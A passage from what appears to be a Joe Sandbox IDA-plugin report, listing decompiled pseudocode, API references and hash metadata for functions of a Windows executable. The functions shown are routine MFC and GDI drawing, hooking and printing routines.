                                            							 *(_t456 - 0x24) =  *(_t456 - 0x64);
                                            							L25:
                                            							 *(_t456 - 0x58) = 0x42cb14;
                                            							 *(_t456 - 4) = 9;
                                            							E0041A668(_t456 - 0x58);
                                            							 *((intOrPtr*)(_t456 - 0x60)) = 0x42cb14;
                                            							 *(_t456 - 4) = 0xa;
                                            							E0041A668(_t456 - 0x60);
                                            							 *((intOrPtr*)(_t456 - 0x4c)) = 0x42cb14;
                                            							 *(_t456 - 4) = 0xb;
                                            						} else {
                                            							E00419B00(_t456 - 0x80);
                                            							 *(_t456 - 4) = 5;
                                            							asm("sbb eax, eax");
                                            							_t267 = E00419BB7(_t456 - 0x80, CreateCompatibleDC( ~(_t456 - 0x44) &  *(_t456 - 0x40)));
                                            							__eflags = _t267;
                                            							if(_t267 != 0) {
                                            								_t268 =  *0x439ca4; // 0x0
                                            								__eflags = _t268;
                                            								if(_t268 == 0) {
                                            									_t447 = 0;
                                            									__eflags = 0;
                                            								} else {
                                            									_t447 = SelectObject( *(_t456 - 0x7c), _t268);
                                            								}
                                            								_t392 =  *0x439c9c; // 0x0
                                            								_t420 =  *0x439c98; // 0x0
                                            								asm("sbb eax, eax");
                                            								BitBlt( *(_t456 - 0x40),  *(_t456 - 0x28),  *(_t456 - 0x24), _t420, _t392,  ~(_t456 - 0x80) &  *(_t456 - 0x7c), 0, 0, 0xcc0020);
                                            								__eflags = _t447;
                                            								if(_t447 != 0) {
                                            									SelectObject( *(_t456 - 0x7c), _t447);
                                            								}
                                            								 *(_t456 - 4) = 3;
                                            								E00419C1F(_t456 - 0x80);
                                            								goto L23;
                                            							} else {
                                            								 *(_t456 - 4) = 3;
                                            								E00419C1F(_t456 - 0x80);
                                            								 *(_t456 - 0x58) = 0x42cb14;
                                            								 *(_t456 - 4) = 6;
                                            								E0041A668(_t456 - 0x58);
                                            								 *((intOrPtr*)(_t456 - 0x60)) = 0x42cb14;
                                            								 *(_t456 - 4) = 7;
                                            								E0041A668(_t456 - 0x60);
                                            								 *((intOrPtr*)(_t456 - 0x4c)) = 0x42cb14;
                                            								 *(_t456 - 4) = 8;
                                            							}
                                            						}
                                            					}
                                            					E0041A668(_t456 - 0x4c);
                                            					_t197 = _t456 - 4;
                                            					 *_t197 =  *(_t456 - 4) | 0xffffffff;
                                            					__eflags =  *_t197;
                                            					_t239 = E0041A48F(_t456 - 0x44);
                                            				} else {
                                            					_t239 = E004136A7(__ecx);
                                            				}
                                            				 *[fs:0x0] =  *((intOrPtr*)(_t456 - 0xc));
                                            				return _t239;
                                            			}

























                                            0x004237c8
                                            0x004237cd
                                            0x004237cf
                                            0x0042380c
                                            0x00423811
                                            0x00423813
                                            0x00423823
                                            0x00423823
                                            0x00423815
                                            0x0042381f
                                            0x0042381f
                                            0x00423825
                                            0x0042382e
                                            0x0042383b
                                            0x00423850
                                            0x00423856
                                            0x00423858
                                            0x0042385e
                                            0x0042385e
                                            0x00423867
                                            0x0042386b
                                            0x00000000
                                            0x004237d1
                                            0x004237d4
                                            0x004237d8
                                            0x004237e2
                                            0x004237e8
                                            0x004237ec
                                            0x004237f1
                                            0x004237f7
                                            0x004237fb
                                            0x00423800
                                            0x00423803
                                            0x00423803
                                            0x004237cf
                                            0x004237a1
                                            0x004238bc
                                            0x004238c1
                                            0x004238c1
                                            0x004238c1
                                            0x004238c8
                                            0x004233a4
                                            0x004233a4
                                            0x004233a4
                                            0x004238d3
                                            0x004238db

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: MetricsSystem$BrushColorCreateRectSolid$H_prologInflateOffsetWindow
                                            • String ID:
                                            • API String ID: 1266645593-0
                                            • Opcode ID: 827b8b6824deef71f215e530bef12f339db5eb1673a232190c9b8040d827e70b
                                            • Instruction ID: 63fa9e6fd2119b7c539c7c0ae66551d555764ff581325622ef96e7efc3e9d792
                                            • Opcode Fuzzy Hash: 827b8b6824deef71f215e530bef12f339db5eb1673a232190c9b8040d827e70b
                                            • Instruction Fuzzy Hash: 1A022871E00219ABCF11DFE4DD89EEEBBB9EF08704F14411AE505B7290DB78AA45CB64
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 90%
                                            			E004139FC(void* __edx, void* _a4, int _a8, long _a12) {
                                            				intOrPtr _v8;
                                            				signed int _v12;
                                            				char _v20;
                                            				void* __ebp;
                                            				intOrPtr _t50;
                                            				signed int _t52;
                                            				long _t53;
                                            				long _t62;
                                            				long _t70;
                                            				char _t71;
                                            				long _t73;
                                            				CHAR* _t76;
                                            				int _t83;
                                            				signed char _t92;
                                            				void* _t93;
                                            				void* _t95;
                                            				long _t96;
                                            				intOrPtr _t99;
                                            				intOrPtr* _t101;
                                            				intOrPtr _t102;
                                            				CHAR* _t104;
                                            				long _t105;
                                            
                                            				_t93 = __edx;
                                            				_t50 = E00425C92(0x4397cc, E0042440D);
                                            				_v8 = _t50;
                                            				if(_a4 != 3) {
                                            					return CallNextHookEx( *(_t50 + 0x2c), _a4, _a8, _a12);
                                            				}
                                            				_t101 =  *((intOrPtr*)(_t50 + 0x14));
                                            				_t95 =  *_a12;
                                            				_t52 =  *(E00424BFB() + 0x14) & 0x000000ff;
                                            				_t83 = _a8;
                                            				_v12 = _t52;
                                            				if(_t101 != 0 || ( *(_t95 + 0x23) & 0x00000040) == 0 && _t52 == 0) {
                                            					if( *0x439c54 == 0) {
                                            						L10:
                                            						if(_t101 == 0) {
                                            							_t53 = GetWindowLongA(_t83, 0xfffffffc);
                                            							_a4 = _t53;
                                            							if(_t53 != 0) {
                                            								_t104 = "AfxOldWndProc423";
                                            								if(GetPropA(_t83, _t104) == 0) {
                                            									SetPropA(_t83, _t104, _a4);
                                            									if(GetPropA(_t83, _t104) == _a4) {
                                            										GlobalAddAtomA(_t104);
                                            										_t62 = E00413980;
                                            										if( *((intOrPtr*)(_v8 + 0x28)) == 0) {
                                            											_t62 = E00413821;
                                            										}
                                            										SetWindowLongA(_t83, 0xfffffffc, _t62);
                                            									}
                                            								}
                                            							}
                                            							goto L27;
                                            						}
                                            						E00413785(_t101, _t83);
                                            						 *((intOrPtr*)( *_t101 + 0x50))();
                                            						_a8 =  *((intOrPtr*)( *_t101 + 0x80))();
                                            						if( *0x439c3c != 0 || _v12 != 0) {
                                            							L18:
                                            							_t105 = E0041381B();
                                            							_t70 = SetWindowLongA(_t83, 0xfffffffc, _t105);
                                            							if(_t70 == _t105) {
                                            								goto L20;
                                            							}
                                            							goto L19;
                                            						} else {
                                            							_t99 =  *0x439c50; // 0x6a2cb0
                                            							if(_t99 == 0 ||  *((intOrPtr*)(_t99 + 0x20)) == 0) {
                                            								goto L18;
                                            							} else {
                                            								_push(0);
                                            								_push(0);
                                            								_push(0x36f);
                                            								_push(_t83);
                                            								_push(_t101);
                                            								_t71 = E0041357F(_t93);
                                            								_v20 = _t71;
                                            								if(_t71 == 0) {
                                            									goto L18;
                                            								}
                                            								_a4 = E0041381B();
                                            								_t73 = GetWindowLongA(_t83, 0xfffffffc);
                                            								asm("sbb esi, esi");
                                            								 *((intOrPtr*)(_t99 + 0x20))(_t83, _v20);
                                            								if( ~(_t73 - _a4) + 1 != 0) {
                                            									L20:
                                            									_t102 = _v8;
                                            									 *(_t102 + 0x14) =  *(_t102 + 0x14) & 0x00000000;
                                            									goto L28;
                                            								}
                                            								_t70 = SetWindowLongA(_t83, 0xfffffffc, _a4);
                                            								L19:
                                            								 *_a8 = _t70;
                                            								goto L20;
                                            							}
                                            						}
                                            					}
                                            					if((GetClassLongA(_t83, 0xffffffe6) & 0x00010000) != 0) {
                                            						goto L27;
                                            					}
                                            					_t76 =  *(_t95 + 0x28);
                                            					_t92 = _t76 >> 0x10;
                                            					if(_t92 == 0) {
                                            						_v20 = _v20 & _t92;
                                            						GlobalGetAtomNameA( *(_t95 + 0x28),  &_v20, 5);
                                            						_t76 =  &_v20;
                                            					}
                                            					if(lstrcmpiA(_t76, ?str?) == 0) {
                                            						goto L27;
                                            					} else {
                                            						goto L10;
                                            					}
                                            				} else {
                                            					L27:
                                            					_t102 = _v8;
                                            					L28:
                                            					_t96 = CallNextHookEx( *(_t102 + 0x2c), 3, _t83, _a12);
                                            					if(_v12 != 0) {
                                            						UnhookWindowsHookEx( *(_t102 + 0x2c));
                                            						 *(_t102 + 0x2c) =  *(_t102 + 0x2c) & 0x00000000;
                                            					}
                                            					return _t96;
                                            				}
                                            			}


























                                            APIs
                                              • Part of subcall function 00425C92: TlsGetValue.KERNEL32(004399AC,?,00000000,00424C0A,0042440D,00424C26,00412700,0041843C,?,00000000,?,0040ECAE,00000000,00000000,00000000,00000000), ref: 00425CD1
                                            • CallNextHookEx.USER32 ref: 00413A26
                                            • GetClassLongA.USER32 ref: 00413A6D
                                            • GlobalGetAtomNameA.KERNEL32 ref: 00413A99
                                            • lstrcmpiA.KERNEL32(?,ime,?,?,?,Function_0002440D), ref: 00413AA8
                                            • GetWindowLongA.USER32 ref: 00413B1B
                                            • SetWindowLongA.USER32 ref: 00413B3C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: Long$Window$AtomCallClassGlobalHookNameNextValuelstrcmpi
                                            • String ID: AfxOldWndProc423$ime
                                            • API String ID: 3731301195-104836986
                                            • Opcode ID: 104baf9216110bbdc268fec6f28eb3b5a99cf74ba741684ded7b0cecb0923a70
                                            • Instruction ID: e36065fefe0489718c47fffdee2bb39183bb531f2b2dfd07b326dd1187a37919
                                            • Opcode Fuzzy Hash: 104baf9216110bbdc268fec6f28eb3b5a99cf74ba741684ded7b0cecb0923a70
                                            • Instruction Fuzzy Hash: C951C531604215ABCF21AF25DC48B9F7BA8FF04762F104525F916A7292D738EE81CB9C
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 90%
                                            			E00423C5A(intOrPtr* __ecx, void* __eflags) {
                                            				void* _t146;
                                            				void* _t150;
                                            				void* _t159;
                                            				void* _t165;
                                            				intOrPtr* _t246;
                                            				RECT* _t250;
                                            				void* _t255;
                                            
                                            				E00406520(E0042AAB8, _t255);
                                            				_t246 = __ecx;
                                            				E00405556(_t255 - 0x2c);
                                            				 *(_t255 - 0x2c) = 0x42f0f0;
                                            				 *((intOrPtr*)(_t255 - 4)) = 0;
                                            				E00405556(_t255 - 0x1c);
                                            				 *(_t255 - 0x1c) = 0x42f0f0;
                                            				 *((char*)(_t255 - 4)) = 1;
                                            				E00405556(_t255 - 0x14);
                                            				 *(_t255 - 0x14) = 0x42f0f0;
                                            				 *((char*)(_t255 - 4)) = 2;
                                            				E0041A611(_t255 - 0x1c, CreateRectRgnIndirect( *(_t255 + 8)));
                                            				CopyRect(_t255 - 0x44,  *(_t255 + 8));
                                            				InflateRect(_t255 - 0x44,  ~( *(_t255 + 0xc)),  ~( *(_t255 + 0x10)));
                                            				IntersectRect(_t255 - 0x44, _t255 - 0x44,  *(_t255 + 8));
                                            				E0041A611(_t255 - 0x14, CreateRectRgnIndirect(_t255 - 0x44));
                                            				E0041A611(_t255 - 0x2c, CreateRectRgn(0, 0, 0, 0));
                                            				asm("sbb eax, eax");
                                            				asm("sbb ecx, ecx");
                                            				CombineRgn( *(_t255 - 0x28),  ~(_t255 - 0x1c) &  *(_t255 - 0x18),  ~(_t255 - 0x14) &  *(_t255 - 0x10), 3);
                                            				_t261 =  *((intOrPtr*)(_t255 + 0x20));
                                            				if( *((intOrPtr*)(_t255 + 0x20)) == 0) {
                                            					 *((intOrPtr*)(_t255 + 0x20)) = E00423BE7(_t261);
                                            				}
                                            				if( *((intOrPtr*)(_t255 + 0x24)) == 0) {
                                            					 *((intOrPtr*)(_t255 + 0x24)) =  *((intOrPtr*)(_t255 + 0x20));
                                            				}
                                            				E00405556(_t255 - 0x24);
                                            				 *(_t255 - 0x24) = 0x42f0f0;
                                            				 *((char*)(_t255 - 4)) = 3;
                                            				E00405556(_t255 - 0x34);
                                            				 *((intOrPtr*)(_t255 - 0x34)) = 0x42f0f0;
                                            				_t250 =  *(_t255 + 0x14);
                                            				 *((char*)(_t255 - 4)) = 4;
                                            				if(_t250 != 0) {
                                            					E0041A611(_t255 - 0x24, CreateRectRgn(0, 0, 0, 0));
                                            					SetRectRgn( *(_t255 - 0x18),  *_t250, _t250->top, _t250->right, _t250->bottom);
                                            					CopyRect(_t255 - 0x44, _t250);
                                            					InflateRect(_t255 - 0x44,  ~( *(_t255 + 0x18)),  ~( *(_t255 + 0x1c)));
                                            					IntersectRect(_t255 - 0x44, _t255 - 0x44, _t250);
                                            					SetRectRgn( *(_t255 - 0x10),  *(_t255 - 0x44),  *(_t255 - 0x40),  *(_t255 - 0x3c),  *(_t255 - 0x38));
                                            					asm("sbb eax, eax");
                                            					asm("sbb ecx, ecx");
                                            					CombineRgn( *(_t255 - 0x20),  ~(_t255 - 0x1c) &  *(_t255 - 0x18),  ~(_t255 - 0x14) &  *(_t255 - 0x10), 3);
                                            					if( *((intOrPtr*)( *((intOrPtr*)(_t255 + 0x20)) + 4)) ==  *((intOrPtr*)( *((intOrPtr*)(_t255 + 0x24)) + 4))) {
                                            						E0041A611(_t255 - 0x34, CreateRectRgn(0, 0, 0, 0));
                                            						asm("sbb eax, eax");
                                            						asm("sbb ecx, ecx");
                                            						CombineRgn( *(_t255 - 0x30),  ~(_t255 - 0x24) &  *(_t255 - 0x20),  ~(_t255 - 0x2c) &  *(_t255 - 0x28), 3);
                                            					}
                                            				}
                                            				if( *((intOrPtr*)( *((intOrPtr*)(_t255 + 0x20)) + 4)) !=  *((intOrPtr*)( *((intOrPtr*)(_t255 + 0x24)) + 4)) && _t250 != 0) {
                                            					E0041A0FB(_t246, _t255 - 0x24);
                                            					 *((intOrPtr*)( *_t246 + 0x50))(_t255 - 0x44);
                                            					_t165 = E00419D35(_t246,  *((intOrPtr*)(_t255 + 0x24)));
                                            					PatBlt( *(_t246 + 4),  *(_t255 - 0x44),  *(_t255 - 0x40),  *(_t255 - 0x3c) -  *(_t255 - 0x44),  *(_t255 - 0x38) -  *(_t255 - 0x40), 0x5a0049);
                                            					E00419D35(_t246, _t165);
                                            				}
                                            				_t146 = _t255 - 0x34;
                                            				if( *(_t255 - 0x30) == 0) {
                                            					_t146 = _t255 - 0x2c;
                                            				}
                                            				E0041A0FB(_t246, _t146);
                                            				 *((intOrPtr*)( *_t246 + 0x50))(_t255 - 0x44);
                                            				_t150 = E00419D35(_t246,  *((intOrPtr*)(_t255 + 0x20)));
                                            				_t251 = _t150;
                                            				PatBlt( *(_t246 + 4),  *(_t255 - 0x44),  *(_t255 - 0x40),  *(_t255 - 0x3c) -  *(_t255 - 0x44),  *(_t255 - 0x38) -  *(_t255 - 0x40), 0x5a0049);
                                            				if(_t150 != 0) {
                                            					E00419D35(_t246, _t251);
                                            				}
                                            				E0041A0FB(_t246, 0);
                                            				 *((intOrPtr*)(_t255 - 0x34)) = 0x42cb14;
                                            				 *((char*)(_t255 - 4)) = 5;
                                            				E0041A668(_t255 - 0x34);
                                            				 *(_t255 - 0x24) = 0x42cb14;
                                            				 *((char*)(_t255 - 4)) = 6;
                                            				E0041A668(_t255 - 0x24);
                                            				 *(_t255 - 0x14) = 0x42cb14;
                                            				 *((char*)(_t255 - 4)) = 7;
                                            				E0041A668(_t255 - 0x14);
                                            				 *(_t255 - 0x1c) = 0x42cb14;
                                            				 *((char*)(_t255 - 4)) = 8;
                                            				E0041A668(_t255 - 0x1c);
                                            				 *(_t255 - 0x2c) = 0x42cb14;
                                            				 *((intOrPtr*)(_t255 - 4)) = 9;
                                            				_t159 = E0041A668(_t255 - 0x2c);
                                            				 *[fs:0x0] =  *((intOrPtr*)(_t255 - 0xc));
                                            				return _t159;
                                            			}











                                            APIs
                                            • __EH_prolog.LIBCMT ref: 00423C5F
                                            • CreateRectRgnIndirect.GDI32(?), ref: 00423CA2
                                            • CopyRect.USER32 ref: 00423CB8
                                            • InflateRect.USER32(?,?,?), ref: 00423CCE
                                            • IntersectRect.USER32 ref: 00423CDF
                                            • CreateRectRgnIndirect.GDI32(?), ref: 00423CE9
                                            • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 00423CFC
                                            • CombineRgn.GDI32(?,?,?,00000003), ref: 00423D26
                                            • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 00423D71
                                            • SetRectRgn.GDI32(?,?,?,?,?), ref: 00423D8E
                                            • CopyRect.USER32 ref: 00423D99
                                            • InflateRect.USER32(?,?,?), ref: 00423DAF
                                            • IntersectRect.USER32 ref: 00423DBE
                                            • SetRectRgn.GDI32(?,?,?,?,?), ref: 00423DD3
                                            • CombineRgn.GDI32(?,?,?,00000003), ref: 00423DF4
                                            • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 00423E0C
                                            • CombineRgn.GDI32(?,?,?,00000003), ref: 00423E36
                                              • Part of subcall function 00423BE7: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,004200A6), ref: 00423C26
                                              • Part of subcall function 00423BE7: CreatePatternBrush.GDI32(00000000), ref: 00423C33
                                              • Part of subcall function 00423BE7: DeleteObject.GDI32(00000000), ref: 00423C3F
                                              • Part of subcall function 0041A0FB: SelectClipRgn.GDI32(?,00000000), ref: 0041A11D
                                              • Part of subcall function 0041A0FB: SelectClipRgn.GDI32(?,?), ref: 0041A133
                                              • Part of subcall function 00419D35: SelectObject.GDI32(?,00000000), ref: 00419D57
                                              • Part of subcall function 00419D35: SelectObject.GDI32(?,?), ref: 00419D6D
                                            • PatBlt.GDI32(?,?,?,?,?,005A0049), ref: 00423E8C
                                            • PatBlt.GDI32(?,?,?,?,?,005A0049), ref: 00423EE0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: Rect$Create$Select$CombineObject$ClipCopyIndirectInflateIntersect$BitmapBrushDeleteH_prologPattern
                                            • String ID:
                                            • API String ID: 4023391435-0
                                            • Opcode ID: 7749715586c1636e3187dfbc3d35a0f18f947e078070156eb7c5ca2835c41bba
                                            • Instruction ID: ab3a66f40d2d04ee3edfb297914df431d927688ea4f6a4c6808893f8cc49b6d9
                                            • Opcode Fuzzy Hash: 7749715586c1636e3187dfbc3d35a0f18f947e078070156eb7c5ca2835c41bba
                                            • Instruction Fuzzy Hash: A4A146B2A00119EFCF05EFA4DD95DEEBBB9EF08304F14411AF506A2250DB38AE55CB64
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 85%
                                            			E00428C35(intOrPtr* __ecx) {
                                            				void* _t19;
                                            				void* _t46;
                                            				void* _t64;
                                            
                                            				if( *(__ecx + 4) != 0) {
                                            					_t64 = SelectObject( *(__ecx + 8), GetStockObject(7));
                                            					SelectObject( *(__ecx + 8), _t64);
                                            					SelectObject( *(__ecx + 4), _t64);
                                            					_t46 = SelectObject( *(__ecx + 8), GetStockObject(4));
                                            					SelectObject( *(__ecx + 8), _t46);
                                            					SelectObject( *(__ecx + 4), _t46);
                                            					E00419E06(__ecx, GetROP2( *(__ecx + 8)));
                                            					E00419DAA(__ecx, GetBkMode( *(__ecx + 8)));
                                            					E0041A240(__ecx, GetTextAlign( *(__ecx + 8)));
                                            					E00419DD8(__ecx, GetPolyFillMode( *(__ecx + 8)));
                                            					E00419E34(__ecx, GetStretchBltMode( *(__ecx + 8)));
                                            					_push(GetNearestColor( *(__ecx + 8), GetTextColor( *(__ecx + 8))));
                                            					 *((intOrPtr*)( *__ecx + 0x30))();
                                            					_push(GetNearestColor( *(__ecx + 8), GetBkColor( *(__ecx + 8))));
                                            					return  *((intOrPtr*)( *__ecx + 0x2c))();
                                            				}
                                            				return _t19;
                                            			}







                                            APIs
                                            • GetStockObject.GDI32(00000007), ref: 00428C4D
                                            • SelectObject.GDI32(00000000,00000000), ref: 00428C59
                                            • SelectObject.GDI32(00000000,00000000), ref: 00428C61
                                            • SelectObject.GDI32(00000000,00000000), ref: 00428C67
                                            • GetStockObject.GDI32(00000004), ref: 00428C6B
                                            • SelectObject.GDI32(00000000,00000000), ref: 00428C71
                                            • SelectObject.GDI32(00000000,00000000), ref: 00428C79
                                            • SelectObject.GDI32(00000000,00000000), ref: 00428C7F
                                            • GetROP2.GDI32(00000000), ref: 00428C84
                                              • Part of subcall function 00419E06: SetROP2.GDI32(?,?), ref: 00419E1F
                                              • Part of subcall function 00419E06: SetROP2.GDI32(?,?), ref: 00419E2D
                                            • GetBkMode.GDI32(00000000,?,?,?,?,00428AF9,00000000), ref: 00428C95
                                              • Part of subcall function 00419DAA: SetBkMode.GDI32(?,?), ref: 00419DC3
                                              • Part of subcall function 00419DAA: SetBkMode.GDI32(?,?), ref: 00419DD1
                                            • GetTextAlign.GDI32(00000000), ref: 00428CA6
                                              • Part of subcall function 0041A240: SetTextAlign.GDI32(?,?), ref: 0041A25B
                                              • Part of subcall function 0041A240: SetTextAlign.GDI32(?,?), ref: 0041A269
                                            • GetPolyFillMode.GDI32(00000000,?,?,?,?,00428AF9,00000000), ref: 00428CB7
                                              • Part of subcall function 00419DD8: SetPolyFillMode.GDI32(?,?), ref: 00419DF1
                                              • Part of subcall function 00419DD8: SetPolyFillMode.GDI32(?,?), ref: 00419DFF
                                            • GetStretchBltMode.GDI32(00000000,?,?,?,?,00428AF9,00000000), ref: 00428CC8
                                              • Part of subcall function 00419E34: SetStretchBltMode.GDI32(?,?), ref: 00419E4D
                                              • Part of subcall function 00419E34: SetStretchBltMode.GDI32(?,?), ref: 00419E5B
                                            • GetTextColor.GDI32(00000000), ref: 00428CD9
                                            • GetNearestColor.GDI32(00000000,00000000,?,?,?,?,00428AF9,00000000), ref: 00428CE9
                                            • GetBkColor.GDI32(00000000), ref: 00428CF6
                                            • GetNearestColor.GDI32(00000000,00000000,?,?,?,?,00428AF9,00000000), ref: 00428D00
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: Mode$Object$Select$ColorText$AlignFillPolyStretch$NearestStock
                                            • String ID:
                                            • API String ID: 1751264856-0
                                            • Opcode ID: 7e84bd095403a9cafc71df7c238300e6e44354511f5331b7d2290ac7b338bee2
                                            • Instruction ID: b09d1b0ebf0f207bae19d4c81b9403c04553573e303ad89ba419e4ec13758243
                                            • Opcode Fuzzy Hash: 7e84bd095403a9cafc71df7c238300e6e44354511f5331b7d2290ac7b338bee2
                                            • Instruction Fuzzy Hash: 76214171200915AFC7227B66DC19D2FBBAEFF887407014429F55A82570CB35ACA29F98
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 95%
                                            			E00427432(intOrPtr* __ecx) {
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* _t171;
                                            				struct HDC__* _t188;
                                            				intOrPtr* _t192;
                                            				intOrPtr _t203;
                                            				struct HBRUSH__* _t239;
                                            				intOrPtr* _t244;
                                            				signed int* _t276;
                                            				intOrPtr* _t281;
                                            				intOrPtr _t301;
                                            				intOrPtr _t317;
                                            				intOrPtr* _t339;
                                            				intOrPtr _t342;
                                            				intOrPtr _t343;
                                            				int* _t351;
                                            				intOrPtr* _t352;
                                            				int _t353;
                                            				void* _t355;
                                            
                                            				_t171 = E00406520(E0042A17C, _t355);
                                            				_t281 = __ecx;
                                            				if( *((intOrPtr*)(__ecx + 0x70)) == 0 ||  *((intOrPtr*)(__ecx + 0x7c)) == 0) {
                                            					L22:
                                            					 *[fs:0x0] =  *((intOrPtr*)(_t355 - 0xc));
                                            					return _t171;
                                            				} else {
                                            					_t339 =  *((intOrPtr*)(_t355 + 8));
                                            					GetViewportOrgEx( *(_t339 + 8), _t355 - 0x24);
                                            					 *((intOrPtr*)(_t355 - 0x38)) = 0;
                                            					 *(_t355 - 0x2c) =  *(_t355 - 0x24);
                                            					 *(_t355 - 0x28) =  *(_t355 - 0x20);
                                            					 *((intOrPtr*)(_t355 - 0x3c)) = 0x42cb24;
                                            					 *(_t355 - 4) = 0;
                                            					E0041A611(_t355 - 0x3c, CreatePen(0, 2, GetSysColor(6)));
                                            					 *(_t355 - 0x30) =  *(_t355 - 0x30) & 0x00000000;
                                            					 *((intOrPtr*)(_t355 - 0x34)) = 0x42cb24;
                                            					 *(_t355 - 4) = 1;
                                            					E0041A611(_t355 - 0x34, CreatePen(0, 3, GetSysColor(0x10)));
                                            					 *((intOrPtr*)(_t355 - 0x10)) = 0;
                                            					 *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x114)) + 0x10)) = 1;
                                            					if( *((intOrPtr*)(_t281 + 0xf8)) <= 0) {
                                            						L21:
                                            						E0041A668(_t355 - 0x3c);
                                            						E0041A668(_t355 - 0x34);
                                            						 *((intOrPtr*)(_t355 - 0x34)) = 0x42cb14;
                                            						 *(_t355 - 4) = 2;
                                            						E0041A668(_t355 - 0x34);
                                            						 *((intOrPtr*)(_t355 - 0x3c)) = 0x42cb14;
                                            						 *(_t355 - 4) = 3;
                                            						_t171 = E0041A668(_t355 - 0x3c);
                                            						goto L22;
                                            					} else {
                                            						 *((intOrPtr*)(_t355 - 0x14)) = 0;
                                            						while(1) {
                                            							 *((intOrPtr*)(_t355 - 0x18)) =  *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x78)) + 0x1c))();
                                            							if(_t339 != 0) {
                                            								_t188 =  *(_t339 + 4);
                                            							} else {
                                            								_t188 = 0;
                                            							}
                                            							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x74)))) + 0x10))(_t188);
                                            							 *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x114)) + 0x14)) =  *((intOrPtr*)(_t281 + 0xf4)) +  *((intOrPtr*)(_t355 - 0x10));
                                            							_t192 =  *((intOrPtr*)(_t281 + 0x114));
                                            							if( *((intOrPtr*)(_t281 + 0xf4)) +  *((intOrPtr*)(_t355 - 0x10)) <= ( *( *((intOrPtr*)( *_t192 + 0x5c)) + 0x1e) & 0x0000ffff)) {
                                            								 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t281 + 0x70)))) + 0xdc))( *((intOrPtr*)(_t281 + 0x74)), _t192);
                                            							}
                                            							 *(_t355 - 0x1c) = GetDeviceCaps( *( *((intOrPtr*)(_t281 + 0x74)) + 8), 0xa);
                                            							SetRect( *((intOrPtr*)(_t281 + 0x114)) + 0x24, 0, 0, GetDeviceCaps( *( *((intOrPtr*)(_t281 + 0x74)) + 8), 8),  *(_t355 - 0x1c));
                                            							DPtoLP( *( *((intOrPtr*)(_t281 + 0x74)) + 8),  *((intOrPtr*)(_t281 + 0x114)) + 0x24, 2);
                                            							 *((intOrPtr*)( *_t339 + 0x1c))();
                                            							_t203 =  *((intOrPtr*)(_t281 + 0x90));
                                            							_t301 =  *((intOrPtr*)(_t355 - 0x14));
                                            							_t351 = _t301 + _t203;
                                            							 *(_t355 - 0x1c) = _t351;
                                            							if( *((intOrPtr*)(_t301 + _t203 + 0x18)) == 0) {
                                            								 *((intOrPtr*)( *_t281 + 0x10c))( *((intOrPtr*)(_t355 - 0x10)));
                                            								if( *((intOrPtr*)(_t281 + 0xec)) != 0) {
                                            									_t276 = E0041AFCE(_t281, _t355 - 0x44);
                                            									 *(_t355 - 0x2c) =  ~( *_t276);
                                            									 *(_t355 - 0x28) =  ~(_t276[1]);
                                            								}
                                            							}
                                            							 *((intOrPtr*)( *_t339 + 0x34))(1);
